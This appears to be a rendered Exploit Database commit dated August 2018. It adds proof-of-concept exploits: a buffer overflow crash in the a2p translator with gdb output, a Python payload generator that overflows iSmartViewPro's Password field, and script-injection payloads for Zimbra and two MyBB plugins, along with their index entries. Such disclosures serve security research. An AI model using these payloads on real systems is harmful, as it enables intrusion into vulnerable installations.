DB: 2018-08-11
5 changes to exploits/shellcodes Awk to Perl 1.007-5 - Buffer Overflow (PoC) iSmartViewPro 1.5 - 'Password' Buffer Overflow MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting Zimbra 8.6.0_GA_1153 - Cross-Site Scripting MyBB Like Plugin 3.0.0 - Cross-Site Scripting
This commit is contained in:
Offensive Security
parent
1d21694058
commit
9773c89242
6 changed files with 126 additions and 0 deletions
37
exploits/linux/local/45009.txt
Normal file
37
exploits/linux/local/45009.txt
Normal file
|
|
@ -0,0 +1,37 @@
|
|||
# Exploit Title: Awk to Perl 1.007-5 - Buffer Overflow (PoC)
|
||||
# Author: Todor Donev
|
||||
# Date: 2018-07-11
|
||||
# Software: Linux Awk to Perl Translator '/usr/bin/a2p'
|
||||
# Version: 1.007-5
|
||||
# CVE: N/A
|
||||
# Tested on: CentOS 6.9, Ubuntu 10
|
||||
|
||||
[todor@adamantium ~]$ python -c "print 'A' * 2070" | a2p > /dev/null
|
||||
Segmentation fault
|
||||
[todor@adamantium ~]$ gdb a2p --quiet
|
||||
Reading symbols from /usr/bin/a2p...(no debugging symbols found)...done.
|
||||
Missing separate debuginfos, use: debuginfo-install *SNIPED*
|
||||
(gdb) r bof
|
||||
Starting program: /usr/bin/a2p bof
|
||||
[Thread debugging using libthread_db enabled]
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0x0074ee65 in fgets () from /lib/libc.so.6
|
||||
(gdb) info reg
|
||||
eax 0x1060 4192
|
||||
ecx 0x1 1
|
||||
edx 0x41414141 1094795585
|
||||
ebx 0x880ff4 8916980
|
||||
esp 0xbffff0f0 0xbffff0f0
|
||||
ebp 0xbffff118 0xbffff118
|
||||
esi 0x41414141 1094795585
|
||||
edi 0x8062920 134621472
|
||||
eip 0x74ee65 0x74ee65 <fgets+53>
|
||||
eflags 0x210216 [ PF AF IF RF ID ]
|
||||
cs 0x73 115
|
||||
ss 0x7b 123
|
||||
ds 0x7b 123
|
||||
es 0x7b 123
|
||||
fs 0x0 0
|
||||
gs 0x33 51
|
||||
(gdb)
|
||||
12
exploits/php/webapps/45177.txt
Normal file
12
exploits/php/webapps/45177.txt
Normal file
|
|
@ -0,0 +1,12 @@
|
|||
# Exploit Title: Xss Zimbra Mail server
|
||||
# Google Dork:
|
||||
# Date: 2018/08/10
|
||||
# Exploit Author: Dinbar78
|
||||
# Vendor Homepage: https://www.zimbra.com/
|
||||
|
||||
# Version: 8.6.0_GA_1153 (build 20141215151110)
|
||||
# bug 103609 or CVE-2016-3411
|
||||
|
||||
|
||||
Payload: es.
|
||||
https:// (zimbrasite)/h/changepass?skin="><script>alert('hacked');</script>
|
||||
24
exploits/php/webapps/45178.txt
Normal file
24
exploits/php/webapps/45178.txt
Normal file
|
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting
|
||||
# Date: 8/1/2018
|
||||
# Author: 0xB9
|
||||
# Twitter: @0xB9Sec
|
||||
# Contact: 0xB9[at]pm.me
|
||||
# Software Link: https://community.mybb.com/mods.php?action=view&pid=360
|
||||
# Version: 3.0.0
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE: CVE-2018-14888
|
||||
|
||||
|
||||
1. Description:
|
||||
This plugin allows users to thank/like other users threads/posts. In user profiles it shows your most liked post/thread, the post/thread subjects aren't sanitized to user input.
|
||||
|
||||
|
||||
2. Proof of Concept:
|
||||
|
||||
- Use the following as the post/thread subject <script>alert('XSS')</script>
|
||||
- Get that post/thread liked by another user (or you)
|
||||
- Visit your profile to see alert.
|
||||
|
||||
|
||||
3. Solution:
|
||||
Update to v3.1.0
|
||||
19
exploits/php/webapps/45179.txt
Normal file
19
exploits/php/webapps/45179.txt
Normal file
|
|
@ -0,0 +1,19 @@
|
|||
# Exploit Title: MyBB Like Plugin 3.0.0 - Cross-Site Scripting
|
||||
# Date: 2018-08-01
|
||||
# Author: 0xB9
|
||||
# Twitter: @0xB9Sec
|
||||
# Software Link: https://community.mybb.com/mods.php?action=view&pid=360
|
||||
# Version: 3.0.0
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE: N/A
|
||||
|
||||
# 1. Description:
|
||||
# This plugin allows users to thank/like other users threads/posts.
|
||||
# In user profiles it shows your most liked post/thread, the post/thread
|
||||
# subjects aren't sanitized to user input.
|
||||
|
||||
# 2. Proof of Concept:
|
||||
|
||||
- Use the following as the post/thread subject <script>alert('XSS')</script>
|
||||
- Get that post/thread liked by another user (or you)
|
||||
- Visit your profile to see alert.
|
||||
29
exploits/windows_x86-64/local/45176.py
Executable file
29
exploits/windows_x86-64/local/45176.py
Executable file
|
|
@ -0,0 +1,29 @@
|
|||
# Exploit Title: iSmartViewPro 1.5 - 'Password' Buffer Overflow
|
||||
# Discovery by: Javier Enrique Rodriguez Gutierrez
|
||||
# Discovery Date: 2018-08-09
|
||||
# Vendor Homepage: https://securimport.com/
|
||||
# Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5
|
||||
# Tested Version: 1.5
|
||||
# Vulnerability Type: Buffer Over Flow Local
|
||||
# Tested on OS: Windows 7 Professional x64 es
|
||||
|
||||
# Steps to Produce the BoF:
|
||||
# 1.- Run python code : python generate.py
|
||||
# 2.- Open generate.txt and copy content to clipboard
|
||||
# 3.- Open iSmartViewPro
|
||||
# 4.- clic button "+"
|
||||
# 5.- Select "add device manually"
|
||||
# 6.- device alias -> "admin"
|
||||
# 7.- DNS/IP/DID -> "0.0.0.0"
|
||||
# 8.- acount -> "admin"
|
||||
# 9.- paste ClipBoard on "Password"
|
||||
# 10.- Save
|
||||
# 11.- BoF
|
||||
|
||||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
buffer = "\x41" * 447
|
||||
eip = "\x42" * 4
|
||||
f = open ("generate.txt", "w")
|
||||
f.write(buffer + eip)
|
||||
f.close()
|
||||
|
|
@ -9837,6 +9837,7 @@ id,file,description,date,author,type,platform,port
|
|||
44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware,
|
||||
44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,
|
||||
44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows,
|
||||
45009,exploits/linux/local/45009.txt,"Awk to Perl 1.007-5 - Buffer Overflow (PoC)",2018-07-11,"Todor Donev",local,linux,
|
||||
45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux,
|
||||
45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows,
|
||||
45026,exploits/windows/local/45026.txt,"Microsoft Enterprise Mode Site List Manager - XML External Entity Injection",2018-07-16,hyp3rlinx,local,windows,
|
||||
|
|
@ -9862,6 +9863,7 @@ id,file,description,date,author,type,platform,port
|
|||
45165,exploits/windows_x86-64/local/45165.py,"iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow",2018-08-08,"Rodrigo Eduardo Rodriguez",local,windows_x86-64,
|
||||
45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64,
|
||||
45175,exploits/linux/local/45175.c,"Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KASLR & SMEP Bypass) Arbitrary File Read",2018-08-09,"Andrey Konovalov",local,linux,
|
||||
45176,exploits/windows_x86-64/local/45176.py,"iSmartViewPro 1.5 - 'Password' Buffer Overflow",2018-08-10,"Javier Enrique Rodriguez Gutierrez",local,windows_x86-64,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
|
@ -39716,6 +39718,7 @@ id,file,description,date,author,type,platform,port
|
|||
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
|
||||
45065,exploits/hardware/webapps/45065.txt,"GeoVision GV-SNVR0811 - Directory Traversal",2018-07-22,"Berk Dusunur",webapps,hardware,
|
||||
45030,exploits/hardware/webapps/45030.txt,"VelotiSmart WiFi B-380 Camera - Directory Traversal",2018-07-16,"Miguel Mendez Z",webapps,hardware,80
|
||||
45178,exploits/php/webapps/45178.txt,"MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting",2018-08-10,0xB9,webapps,php,
|
||||
45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
|
||||
45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80
|
||||
45021,exploits/hardware/webapps/45021.txt,"Cela Link CLR-M20 2.7.1.6 - Arbitrary File Upload",2018-07-13,"Safak Aslan",webapps,hardware,
|
||||
|
|
@ -39774,3 +39777,5 @@ id,file,description,date,author,type,platform,port
|
|||
45154,exploits/php/webapps/45154.html,"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)",2018-08-06,r3m0t3nu11,webapps,php,443
|
||||
45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
|
||||
45173,exploits/hardware/webapps/45173.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)",2018-08-09,Wadeek,webapps,hardware,80
|
||||
45177,exploits/php/webapps/45177.txt,"Zimbra 8.6.0_GA_1153 - Cross-Site Scripting",2018-08-10,"Dino Barlattani",webapps,php,
|
||||
45179,exploits/php/webapps/45179.txt,"MyBB Like Plugin 3.0.0 - Cross-Site Scripting",2018-08-10,0xB9,webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue